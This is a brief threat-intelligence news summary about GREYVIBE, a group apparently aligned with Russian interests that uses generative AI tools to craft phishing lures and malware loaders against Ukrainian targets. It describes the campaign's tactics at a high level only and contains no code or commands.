Attack Campaign Overview
A cyber threat group tracked as GREYVIBE has been actively using generative AI platforms such as ChatGPT and Google Gemini to enhance its attack operations since at least August 2025. The campaign primarily targets government, military, and civilian entities in Ukraine. Researchers from WithSecure identified GREYVIBE as a previously unknown group with consistent infrastructure and operational patterns across multiple campaigns. While no definitive attribution has been made, the group’s activities align with Russian state interests, particularly intelligence gathering related to the Russia Ukraine conflict. Evidence includes Russian language artifacts, activity during Moscow time zone hours, and targeting of Ukrainian institutions.
How GREYVIBE Uses AI and Attack Tactics
GREYVIBE employs a multi vector strategy combining spear phishing emails, fake CAPTCHA verification pages, and fraudulent websites to distribute malware. In spear phishing campaigns, attackers impersonate Ukrainian government agencies and distribute malicious archives through cloud services like Google Drive. These payloads run decoy documents while initiating infection chains with custom loaders. Another tactic involves fake CAPTCHA pages that trick victims into executing malicious commands under the guise of verification. The group also operates deceptive adult club websites targeting Ukrainian individuals, including military personnel, to deliver malware such as FallSpy for Android and PhantomRelay for Windows.
Generative AI is used throughout the attack lifecycle. Tools like ChatGPT, Google Gemini, and Ideogram AI generate phishing lures, develop malware components, and support post compromise activities. Researchers found AI generated code patterns in obfuscators and loaders like DAYLIGHT and TEASOUP, as well as in the development of LegionRelay, a custom PowerShell based remote access trojan.
Source: Cyber Security News
